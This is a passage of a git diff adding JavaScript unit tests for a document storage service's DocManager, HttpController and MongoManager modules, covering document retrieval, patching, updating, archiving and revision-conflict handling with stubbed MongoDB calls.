{ include_deleted: false }, + this.filter + ) + }) + + it('should return the docs', function () { + expect(this.result).to.deep.equal(this.docs) + }) + }) + + describe('when there are no docs for the project', function () { + it('should return a NotFoundError', async function () { + this.MongoManager.promises.getProjectsDocs.resolves(null) + this.DocArchiveManager.promises.unArchiveAllDocs.resolves(null) + await expect( + this.DocManager.promises.getAllNonDeletedDocs( + this.project_id, + this.filter + ) + ).to.be.rejectedWith(`No docs for project ${this.project_id}`) + }) + }) + }) + + describe('patchDoc', function () { + describe('when the doc exists', function () { + beforeEach(function () { + this.lines = ['mock', 'doc', 'lines'] + this.rev = 77 + this.MongoManager.promises.findDoc.resolves({ + _id: new ObjectId(this.doc_id), + }) + this.meta = {} + }) + + describe('standard path', function () { + beforeEach(async function () { + await this.DocManager.promises.patchDoc( + this.project_id, + this.doc_id, + this.meta + ) + }) + + it('should get the doc', function () { + expect(this.MongoManager.promises.findDoc).to.have.been.calledWith( + this.project_id, + this.doc_id + ) + }) + + it('should persist the meta', function () { + expect(this.MongoManager.promises.patchDoc).to.have.been.calledWith( + this.project_id, + this.doc_id, + this.meta + ) + }) + }) + + describe('background flush disabled and deleting a doc', function () { + beforeEach(async function () { + this.settings.docstore.archiveOnSoftDelete = false + this.meta.deleted = true + + await this.DocManager.promises.patchDoc( + this.project_id, + this.doc_id, + this.meta + ) + }) + + it('should not flush the doc out of mongo', function () { + expect(this.DocArchiveManager.promises.archiveDoc).to.not.have.been + .called + }) + }) + + describe('background flush enabled and not deleting a doc', function () { + beforeEach(async function () { + this.settings.docstore.archiveOnSoftDelete = false + this.meta.deleted = false + await this.DocManager.promises.patchDoc( + this.project_id, + this.doc_id, + this.meta + ) + }) + + it('should not flush the doc out of mongo', function () { + expect(this.DocArchiveManager.promises.archiveDoc).to.not.have.been + .called + }) + }) + + describe('background flush enabled and deleting a doc', function () { + beforeEach(function () { + this.settings.docstore.archiveOnSoftDelete = true + this.meta.deleted = true + }) + + describe('when the background flush succeeds', function () { + beforeEach(async function () { + await this.DocManager.promises.patchDoc( + this.project_id, + this.doc_id, + this.meta + ) + }) + + it('should not log a warning', function () { + expect(this.logger.warn).to.not.have.been.called + }) + + it('should flush the doc out of mongo', function () { + expect( + this.DocArchiveManager.promises.archiveDoc + ).to.have.been.calledWith(this.project_id, this.doc_id) + }) + }) + + describe('when the background flush fails', function () { + beforeEach(async function () { + this.err = new Error('foo') + this.DocArchiveManager.promises.archiveDoc.rejects(this.err) + await this.DocManager.promises.patchDoc( + this.project_id, + this.doc_id, + this.meta + ) + }) + + it('should log a warning', function () { + expect(this.logger.warn).to.have.been.calledWith( + sinon.match({ + projectId: this.project_id, + docId: this.doc_id, + err: this.err, + }), + 'archiving a single doc in the background failed' + ) + }) + }) + }) + }) + + describe('when the doc does not exist', function () { + it('should return a NotFoundError', async function () { + this.MongoManager.promises.findDoc.resolves(null) + await expect( + this.DocManager.promises.patchDoc(this.project_id, this.doc_id, {}) + ).to.be.rejectedWith( + `No such project/doc to delete: ${this.project_id}/${this.doc_id}` + ) + }) + }) + }) + + describe('updateDoc', function () { + beforeEach(function () { + this.oldDocLines = ['old', 'doc', 'lines'] + this.newDocLines = ['new', 'doc', 'lines'] + this.originalRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.newRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'bar', p: 6 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.version = 42 + this.doc = { + _id: this.doc_id, + project_id: this.project_id, + lines: this.oldDocLines, + rev: (this.rev = 5), + version: this.version, + ranges: this.originalRanges, + } + + this.DocManager.promises._getDoc = sinon.stub() + }) + + describe('when only the doc lines have changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + }) + + it('should get the existing doc', function () { + this.DocManager.promises._getDoc + .calledWith(this.project_id, this.doc_id, { + version: true, + rev: true, + lines: true, + ranges: true, + inS3: true, + }) + .should.equal(true) + }) + + it('should upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection + .calledWith(this.project_id, this.doc_id, this.rev, { + lines: this.newDocLines, + }) + .should.equal(true) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + + describe('when the doc ranges have changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.RangeManager.shouldUpdateRanges.returns(true) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version, + this.newRanges + ) + }) + + it('should upsert the ranges', function () { + this.MongoManager.promises.upsertIntoDocCollection + .calledWith(this.project_id, this.doc_id, this.rev, { + ranges: this.newRanges, + }) + .should.equal(true) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + + describe('when only the version has changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version + 1, + this.originalRanges + ) + }) + + it('should update the version', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + this.rev, + { version: this.version + 1 } + ) + }) + + it('should return the old rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev }) + }) + }) + + describe('when the doc has not changed at all', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines, + this.version, + this.originalRanges + ) + }) + + it('should not update the ranges or lines or version', function () { + this.MongoManager.promises.upsertIntoDocCollection.called.should.equal( + false + ) + }) + + it('should return the old rev and modified == false', function () { + expect(this.result).to.deep.equal({ modified: false, rev: this.rev }) + }) + }) + + describe('when the version is null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + null, + this.originalRanges + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when the lines are null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + null, + this.version, + this.originalRanges + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when the ranges are null', function () { + it('should return an error', async function () { + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + null + ) + ).to.be.rejectedWith('no lines, version or ranges provided') + }) + }) + + describe('when there is a generic error getting the doc', function () { + beforeEach(async function () { + this.error = new Error('doc could not be found') + this.DocManager.promises._getDoc = sinon.stub().rejects(this.error) + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + ).to.be.rejectedWith(this.error) + }) + + it('should not upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.not.have.been + .called + }) + }) + + describe('when the version was decremented', function () { + it('should return an error', async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + await expect( + this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version - 1, + this.originalRanges + ) + ).to.be.rejectedWith(Errors.DocVersionDecrementedError) + }) + }) + + describe('when the doc lines have not changed', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.oldDocLines.slice(), + this.version, + this.originalRanges + ) + }) + + it('should not update the doc', function () { + this.MongoManager.promises.upsertIntoDocCollection.called.should.equal( + false + ) + }) + + it('should return the existing rev', function () { + expect(this.result).to.deep.equal({ modified: false, rev: this.rev }) + }) + }) + + describe('when the doc does not exist', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(null) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version, + this.originalRanges + ) + }) + + it('should upsert the document to the doc collection', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + undefined, + { + lines: this.newDocLines, + ranges: this.originalRanges, + version: this.version, + } + ) + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: 1 }) + }) + }) + + describe('when another update is racing', function () { + beforeEach(async function () { + this.DocManager.promises._getDoc = sinon.stub().resolves(this.doc) + this.MongoManager.promises.upsertIntoDocCollection + .onFirstCall() + .rejects(new Errors.DocRevValueError()) + this.RangeManager.shouldUpdateRanges.returns(true) + this.result = await this.DocManager.promises.updateDoc( + this.project_id, + this.doc_id, + this.newDocLines, + this.version + 1, + this.newRanges + ) + }) + + it('should upsert the doc twice', function () { + this.MongoManager.promises.upsertIntoDocCollection.should.have.been.calledWith( + this.project_id, + this.doc_id, + this.rev, + { + ranges: this.newRanges, + lines: this.newDocLines, + version: this.version + 1, + } + ) + this.MongoManager.promises.upsertIntoDocCollection.should.have.been + .calledTwice + }) + + it('should return the new rev', function () { + expect(this.result).to.deep.equal({ modified: true, rev: this.rev + 1 }) + }) + }) + }) +}) diff --git a/services/docstore/test/unit/js/HttpControllerTests.js b/services/docstore/test/unit/js/HttpControllerTests.js new file mode 100644 index 0000000..bf78696 --- /dev/null +++ b/services/docstore/test/unit/js/HttpControllerTests.js @@ -0,0 +1,578 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { assert, expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/HttpController' +) +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') + +describe('HttpController', function () { + beforeEach(function () { + const settings = { + max_doc_length: 2 * 1024 * 1024, + } + this.DocArchiveManager = { + unArchiveAllDocs: sinon.stub().yields(), + } + this.DocManager = {} + this.HttpController = SandboxedModule.require(modulePath, { + requires: { + './DocManager': this.DocManager, + './DocArchiveManager': this.DocArchiveManager, + '@overleaf/settings': settings, + './HealthChecker': {}, + './Errors': Errors, + }, + }) + this.res = { + send: sinon.stub(), + sendStatus: sinon.stub(), + json: sinon.stub(), + setHeader: sinon.stub(), + } + this.res.status = sinon.stub().returns(this.res) + this.req = { query: {} } + this.next = sinon.stub() + this.projectId = 'mock-project-id' + this.docId = 'mock-doc-id' + this.doc = { + _id: this.docId, + lines: ['mock', 'lines', ' here', '', '', ' spaces '], + version: 42, + rev: 5, + } + this.deletedDoc = { + deleted: true, + _id: this.docId, + lines: ['mock', 'lines', ' here', '', '', ' spaces '], + version: 42, + rev: 5, + } + }) + + describe('getDoc', function () { + describe('without deleted docs', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getFullDoc = sinon + .stub() + .callsArgWith(2, null, this.doc) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should get the document with the version (including deleted)', function () { + this.DocManager.getFullDoc + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + _id: this.docId, + lines: this.doc.lines, + rev: this.doc.rev, + version: this.doc.version, + }) + .should.equal(true) + }) + }) + + describe('which is deleted', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getFullDoc = sinon + .stub() + .callsArgWith(2, null, this.deletedDoc) + }) + + it('should get the doc from the doc manager', function () { + this.HttpController.getDoc(this.req, this.res, this.next) + this.DocManager.getFullDoc + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should return 404 if the query string delete is not set ', function () { + this.HttpController.getDoc(this.req, this.res, this.next) + this.res.sendStatus.calledWith(404).should.equal(true) + }) + + it('should return the doc as JSON if include_deleted is set to true', function () { + this.req.query.include_deleted = 'true' + this.HttpController.getDoc(this.req, this.res, this.next) + this.res.json + .calledWith({ + _id: this.docId, + lines: this.doc.lines, + rev: this.doc.rev, + deleted: true, + version: this.doc.version, + }) + .should.equal(true) + }) + }) + }) + + describe('getRawDoc', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.DocManager.getDocLines = sinon.stub().callsArgWith(2, null, this.doc) + this.HttpController.getRawDoc(this.req, this.res, this.next) + }) + + it('should get the document without the version', function () { + this.DocManager.getDocLines + .calledWith(this.projectId, this.docId) + .should.equal(true) + }) + + it('should set the content type header', function () { + this.res.setHeader + .calledWith('content-type', 'text/plain') + .should.equal(true) + }) + + it('should send the raw version of the doc', function () { + assert.deepEqual( + this.res.send.args[0][0], + `${this.doc.lines[0]}\n${this.doc.lines[1]}\n${this.doc.lines[2]}\n${this.doc.lines[3]}\n${this.doc.lines[4]}\n${this.doc.lines[5]}` + ) + }) + }) + + describe('getAllDocs', function () { + describe('normally', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'one'], + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should get all the (non-deleted) docs', function () { + this.DocManager.getAllNonDeletedDocs + .calledWith(this.projectId, { lines: true, rev: true }) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: this.docs[0].lines, + rev: this.docs[0].rev, + }, + { + _id: this.docs[1]._id.toString(), + lines: this.docs[1].lines, + rev: this.docs[1].rev, + }, + ]) + .should.equal(true) + }) + }) + + describe('with null lines', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: null, + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should return the doc with fallback lines', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: [], + rev: this.docs[0].rev, + }, + { + _id: this.docs[1]._id.toString(), + lines: this.docs[1].lines, + rev: this.docs[1].rev, + }, + ]) + .should.equal(true) + }) + }) + + describe('with a null doc', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'one'], + rev: 2, + }, + null, + { + _id: new ObjectId(), + lines: ['mock', 'lines', 'two'], + rev: 4, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllDocs(this.req, this.res, this.next) + }) + + it('should return the non null docs as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + lines: this.docs[0].lines, + rev: this.docs[0].rev, + }, + { + _id: this.docs[2]._id.toString(), + lines: this.docs[2].lines, + rev: this.docs[2].rev, + }, + ]) + .should.equal(true) + }) + + it('should log out an error', function () { + this.logger.error + .calledWith( + { + err: sinon.match.has('message', 'null doc'), + projectId: this.projectId, + }, + 'encountered null doc' + ) + .should.equal(true) + }) + }) + }) + + describe('getAllRanges', function () { + describe('normally', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.docs = [ + { + _id: new ObjectId(), + ranges: { mock_ranges: 'one' }, + }, + { + _id: new ObjectId(), + ranges: { mock_ranges: 'two' }, + }, + ] + this.DocManager.getAllNonDeletedDocs = sinon + .stub() + .callsArgWith(2, null, this.docs) + this.HttpController.getAllRanges(this.req, this.res, this.next) + }) + + it('should get all the (non-deleted) doc ranges', function () { + this.DocManager.getAllNonDeletedDocs + .calledWith(this.projectId, { ranges: true }) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith([ + { + _id: this.docs[0]._id.toString(), + ranges: this.docs[0].ranges, + }, + { + _id: this.docs[1]._id.toString(), + ranges: this.docs[1].ranges, + }, + ]) + .should.equal(true) + }) + }) + }) + + describe('updateDoc', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + }) + + describe('when the doc lines exist and were updated', function () { + beforeEach(function () { + this.req.body = { + lines: (this.lines = ['hello', 'world']), + version: (this.version = 42), + ranges: (this.ranges = { changes: 'mock' }), + } + this.DocManager.updateDoc = sinon + .stub() + .yields(null, true, (this.rev = 5)) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should update the document', function () { + this.DocManager.updateDoc + .calledWith( + this.projectId, + this.docId, + this.lines, + this.version, + this.ranges + ) + .should.equal(true) + }) + + it('should return a modified status', function () { + this.res.json + .calledWith({ modified: true, rev: this.rev }) + .should.equal(true) + }) + }) + + describe('when the doc lines exist and were not updated', function () { + beforeEach(function () { + this.req.body = { + lines: (this.lines = ['hello', 'world']), + version: (this.version = 42), + ranges: {}, + } + this.DocManager.updateDoc = sinon + .stub() + .yields(null, false, (this.rev = 5)) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should return a modified status', function () { + this.res.json + .calledWith({ modified: false, rev: this.rev }) + .should.equal(true) + }) + }) + + describe('when the doc lines are not provided', function () { + beforeEach(function () { + this.req.body = { version: 42, ranges: {} } + this.DocManager.updateDoc = sinon.stub().yields(null, false) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should not update the document', function () { + this.DocManager.updateDoc.called.should.equal(false) + }) + + it('should return a 400 (bad request) response', function () { + this.res.sendStatus.calledWith(400).should.equal(true) + }) + }) + + describe('when the doc version are not provided', function () { + beforeEach(function () { + this.req.body = { version: 42, lines: ['hello world'] } + this.DocManager.updateDoc = sinon.stub().yields(null, false) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should not update the document', function () { + this.DocManager.updateDoc.called.should.equal(false) + }) + + it('should return a 400 (bad request) response', function () { + this.res.sendStatus.calledWith(400).should.equal(true) + }) + }) + + describe('when the doc ranges is not provided', function () { + beforeEach(function () { + this.req.body = { lines: ['foo'], version: 42 } + this.DocManager.updateDoc = sinon.stub().yields(null, false) + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should not update the document', function () { + this.DocManager.updateDoc.called.should.equal(false) + }) + + it('should return a 400 (bad request) response', function () { + this.res.sendStatus.calledWith(400).should.equal(true) + }) + }) + + describe('when the doc body is too large', function () { + beforeEach(function () { + this.req.body = { + lines: (this.lines = Array(2049).fill('a'.repeat(1024))), + version: (this.version = 42), + ranges: (this.ranges = { changes: 'mock' }), + } + this.HttpController.updateDoc(this.req, this.res, this.next) + }) + + it('should return a 413 (too large) response', function () { + sinon.assert.calledWith(this.res.status, 413) + }) + + it('should report that the document body is too large', function () { + sinon.assert.calledWith(this.res.send, 'document body too large') + }) + }) + }) + + describe('patchDoc', function () { + beforeEach(function () { + this.req.params = { + project_id: this.projectId, + doc_id: this.docId, + } + this.req.body = { name: 'foo.tex' } + this.DocManager.patchDoc = sinon.stub().yields(null) + this.HttpController.patchDoc(this.req, this.res, this.next) + }) + + it('should delete the document', function () { + expect(this.DocManager.patchDoc).to.have.been.calledWith( + this.projectId, + this.docId + ) + }) + + it('should return a 204 (No Content)', function () { + expect(this.res.sendStatus).to.have.been.calledWith(204) + }) + + describe('with an invalid payload', function () { + beforeEach(function () { + this.req.body = { cannot: 'happen' } + + this.DocManager.patchDoc = sinon.stub().yields(null) + this.HttpController.patchDoc(this.req, this.res, this.next) + }) + + it('should log a message', function () { + expect(this.logger.fatal).to.have.been.calledWith( + { field: 'cannot' }, + 'joi validation for pathDoc is broken' + ) + }) + + it('should not pass the invalid field along', function () { + expect(this.DocManager.patchDoc).to.have.been.calledWith( + this.projectId, + this.docId, + {} + ) + }) + }) + }) + + describe('archiveAllDocs', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.DocArchiveManager.archiveAllDocs = sinon.stub().callsArg(1) + this.HttpController.archiveAllDocs(this.req, this.res, this.next) + }) + + it('should archive the project', function () { + this.DocArchiveManager.archiveAllDocs + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should return a 204 (No Content)', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('unArchiveAllDocs', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + }) + + describe('on success', function () { + beforeEach(function (done) { + this.res.sendStatus.callsFake(() => done()) + this.HttpController.unArchiveAllDocs(this.req, this.res, this.next) + }) + + it('returns a 200', function () { + expect(this.res.sendStatus).to.have.been.calledWith(200) + }) + }) + + describe("when the archived rev doesn't match", function () { + beforeEach(function (done) { + this.res.sendStatus.callsFake(() => done()) + this.DocArchiveManager.unArchiveAllDocs.yields( + new Errors.DocRevValueError('bad rev') + ) + this.HttpController.unArchiveAllDocs(this.req, this.res, this.next) + }) + + it('returns a 409', function () { + expect(this.res.sendStatus).to.have.been.calledWith(409) + }) + }) + }) + + describe('destroyProject', function () { + beforeEach(function () { + this.req.params = { project_id: this.projectId } + this.DocArchiveManager.destroyProject = sinon.stub().callsArg(1) + this.HttpController.destroyProject(this.req, this.res, this.next) + }) + + it('should destroy the docs', function () { + sinon.assert.calledWith( + this.DocArchiveManager.destroyProject, + this.projectId + ) + }) + + it('should return 204', function () { + sinon.assert.calledWith(this.res.sendStatus, 204) + }) + }) +}) diff --git a/services/docstore/test/unit/js/MongoManagerTests.js b/services/docstore/test/unit/js/MongoManagerTests.js new file mode 100644 index 0000000..4f8467d --- /dev/null +++ b/services/docstore/test/unit/js/MongoManagerTests.js @@ -0,0 +1,407 @@ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/MongoManager' +) +const { ObjectId } = require('mongodb-legacy') +const { assert, expect } = require('chai') +const Errors = require('../../../app/js/Errors') + +describe('MongoManager', function () { + beforeEach(function () { + this.db = { + docs: { + updateOne: sinon.stub().resolves({ matchedCount: 1 }), + insertOne: sinon.stub().resolves(), + }, + } + this.MongoManager = SandboxedModule.require(modulePath, { + requires: { + './mongodb': { + db: this.db, + ObjectId, + }, + '@overleaf/settings': { + max_deleted_docs: 42, + docstore: { archivingLockDurationMs: 5000 }, + }, + './Errors': Errors, + }, + }) + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + this.rev = 42 + this.stubbedErr = new Error('hello world') + this.lines = ['Three French hens', 'Two turtle doves'] + }) + + describe('findDoc', function () { + beforeEach(async function () { + this.doc = { name: 'mock-doc' } + this.db.docs.findOne = sinon.stub().resolves(this.doc) + this.filter = { lines: true } + this.result = await this.MongoManager.promises.findDoc( + this.projectId, + this.docId, + this.filter + ) + }) + + it('should find the doc', function () { + this.db.docs.findOne + .calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + }, + { + projection: this.filter, + } + ) + .should.equal(true) + }) + + it('should return the doc', function () { + expect(this.doc).to.deep.equal(this.doc) + }) + }) + + describe('patchDoc', function () { + beforeEach(async function () { + this.meta = { name: 'foo.tex' } + await this.MongoManager.promises.patchDoc( + this.projectId, + this.docId, + this.meta + ) + }) + + it('should pass the parameter along', function () { + this.db.docs.updateOne.should.have.been.calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + }, + { + $set: this.meta, + } + ) + }) + }) + + describe('getProjectsDocs', function () { + beforeEach(function () { + this.filter = { lines: true } + this.doc1 = { name: 'mock-doc1' } + this.doc2 = { name: 'mock-doc2' } + this.doc3 = { name: 'mock-doc3' } + this.doc4 = { name: 'mock-doc4' } + this.db.docs.find = sinon.stub().returns({ + toArray: sinon.stub().resolves([this.doc, this.doc3, this.doc4]), + }) + }) + + describe('with included_deleted = false', function () { + beforeEach(async function () { + this.result = await this.MongoManager.promises.getProjectsDocs( + this.projectId, + { include_deleted: false }, + this.filter + ) + }) + + it('should find the non-deleted docs via the project_id', function () { + this.db.docs.find + .calledWith( + { + project_id: new ObjectId(this.projectId), + deleted: { $ne: true }, + }, + { + projection: this.filter, + } + ) + .should.equal(true) + }) + + it('should call return the docs', function () { + expect(this.result).to.deep.equal([this.doc, this.doc3, this.doc4]) + }) + }) + + describe('with included_deleted = true', function () { + beforeEach(async function () { + this.result = await this.MongoManager.promises.getProjectsDocs( + this.projectId, + { include_deleted: true }, + this.filter + ) + }) + + it('should find all via the project_id', function () { + this.db.docs.find + .calledWith( + { + project_id: new ObjectId(this.projectId), + }, + { + projection: this.filter, + } + ) + .should.equal(true) + }) + + it('should return the docs', function () { + expect(this.result).to.deep.equal([this.doc, this.doc3, this.doc4]) + }) + }) + }) + + describe('getProjectsDeletedDocs', function () { + beforeEach(async function () { + this.filter = { name: true } + this.doc1 = { _id: '1', name: 'mock-doc1.tex' } + this.doc2 = { _id: '2', name: 'mock-doc2.tex' } + this.doc3 = { _id: '3', name: 'mock-doc3.tex' } + this.db.docs.find = sinon.stub().returns({ + toArray: sinon.stub().resolves([this.doc1, this.doc2, this.doc3]), + }) + this.result = await this.MongoManager.promises.getProjectsDeletedDocs( + this.projectId, + this.filter + ) + }) + + it('should find the deleted docs via the project_id', function () { + this.db.docs.find + .calledWith({ + project_id: new ObjectId(this.projectId), + deleted: true, + }) + .should.equal(true) + }) + + it('should filter, sort by deletedAt and limit', function () { + this.db.docs.find + .calledWith(sinon.match.any, { + projection: this.filter, + sort: { deletedAt: -1 }, + limit: 42, + }) + .should.equal(true) + }) + + it('should return the docs', function () { + expect(this.result).to.deep.equal([this.doc1, this.doc2, this.doc3]) + }) + }) + + describe('upsertIntoDocCollection', function () { + beforeEach(function () { + this.oldRev = 77 + }) + + it('should upsert the document', async function () { + await this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + this.oldRev, + { lines: this.lines } + ) + + const args = this.db.docs.updateOne.args[0] + assert.deepEqual(args[0], { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.oldRev, + }) + assert.equal(args[1].$set.lines, this.lines) + assert.equal(args[1].$inc.rev, 1) + }) + + it('should handle update error', async function () { + this.db.docs.updateOne.rejects(this.stubbedErr) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + this.rev, + { + lines: this.lines, + } + ) + ).to.be.rejectedWith(this.stubbedErr) + }) + + it('should insert without a previous rev', async function () { + await this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + + expect(this.db.docs.insertOne).to.have.been.calledWith({ + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: 1, + lines: this.lines, + ranges: this.ranges, + }) + }) + + it('should handle generic insert error', async function () { + this.db.docs.insertOne.rejects(this.stubbedErr) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + ).to.be.rejectedWith(this.stubbedErr) + }) + + it('should handle duplicate insert error', async function () { + this.db.docs.insertOne.rejects({ code: 11000 }) + await expect( + this.MongoManager.promises.upsertIntoDocCollection( + this.projectId, + this.docId, + null, + { lines: this.lines, ranges: this.ranges } + ) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + + describe('destroyProject', function () { + beforeEach(async function () { + this.projectId = new ObjectId() + this.db.docs.deleteMany = sinon.stub().resolves() + await this.MongoManager.promises.destroyProject(this.projectId) + }) + + it('should destroy all docs', function () { + sinon.assert.calledWith(this.db.docs.deleteMany, { + project_id: this.projectId, + }) + }) + }) + + describe('checkRevUnchanged', function () { + this.beforeEach(function () { + this.doc = { _id: new ObjectId(), name: 'mock-doc', rev: 1 } + }) + + it('should not error when the rev has not changed', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 1 }) + await this.MongoManager.promises.checkRevUnchanged(this.doc) + }) + + it('should return an error when the rev has changed', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 2 }) + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocModifiedError) + }) + + it('should return a value error if incoming rev is NaN', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: 2 }) + this.doc = { _id: new ObjectId(), name: 'mock-doc', rev: NaN } + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + + it('should return a value error if checked doc rev is NaN', async function () { + this.db.docs.findOne = sinon.stub().resolves({ rev: NaN }) + await expect( + this.MongoManager.promises.checkRevUnchanged(this.doc) + ).to.be.rejectedWith(Errors.DocRevValueError) + }) + }) + + describe('restoreArchivedDoc', function () { + beforeEach(function () { + this.archivedDoc = { + lines: ['a', 'b', 'c'], + ranges: { some: 'ranges' }, + rev: 2, + } + }) + + describe('complete doc', function () { + beforeEach(async function () { + await this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + }) + + it('updates Mongo', function () { + expect(this.db.docs.updateOne).to.have.been.calledWith( + { + _id: new ObjectId(this.docId), + project_id: new ObjectId(this.projectId), + rev: this.archivedDoc.rev, + }, + { + $set: { + lines: this.archivedDoc.lines, + ranges: this.archivedDoc.ranges, + }, + $unset: { + inS3: true, + }, + } + ) + }) + }) + + describe('without ranges', function () { + beforeEach(async function () { + delete this.archivedDoc.ranges + await this.MongoManager.promises.restoreArchivedDoc( + this.projectId, + this.docId, + this.archivedDoc + ) + }) + + it('sets ranges to 